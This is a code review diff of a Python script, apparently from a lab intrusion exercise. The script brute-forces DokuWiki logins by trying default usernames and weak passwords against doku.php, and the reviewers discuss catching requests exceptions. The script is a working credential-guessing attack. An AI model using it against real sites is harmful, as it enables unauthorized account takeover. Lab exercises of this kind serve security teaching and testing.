groups/isp-a/hacker/homedir/tp/intrusion/dokuwiki.py

```diff
@@ -1,34 +1,38 @@
 #!/usr/bin/python3
-import io,sys
+import io
+import sys
 import requests
 
-users = ['root','admin','sys']
-passwords = ['1234','123456','@password','admin']
+
+users = ['root', 'admin', 'sys']
+passwords = ['1234', '123456', '@password', 'admin']
+
 
 def bruteforce(server):
     for user in users:
         for password in passwords:
             try:
-                payload = {'u': user, 'p': password, 'id' : 'start', 'do': 'login', 'r':'1', 'sectok':''}
-                r = requests.post("http://"+server+"/doku.php", data=payload) #, cookies=mycookies)
-                #print(r.status_code, r.reason)
-                #print(r.content)
-                #print(r.cookies)
-                print ("[+] Tested : "+user+" / Mot de passe : "+password)
+                payload = {'u': user, 'p': password, 'id': 'start', 'do': 'login', 'r': '1', 'sectok': ''}
+                r = requests.post("http://" + server + "/doku.php", data=payload)  # , cookies=mycookies)
+                # print(r.status_code, r.reason)
+                # print(r.content)
+                # print(r.cookies)
+                print("[+] Tested : " + user + " / Mot de passe : " + password)
                 if ('Admin' in r.text):
-                    print ("[++] Compte identifie : "+user+" / Mot de passe : "+password)
+                    print("[++] Compte identifie : " + user + " / Mot de passe : " + password)
                     return  # on s'arrête dès qu'on a trouvé un couple
             except:
```

Comment:
As you metionned it, I think we should catch requests.exceptions.RequestException (https://stackoverflow.com/questions/16511337/correct-way-to-try-except-using-python-requests-module  https://fr.python-requests.org/en/latest/user/quickstart.html#erreurs-et-exceptions). Does it seem ok ?

Reply:
This seems to me to be the right way to go.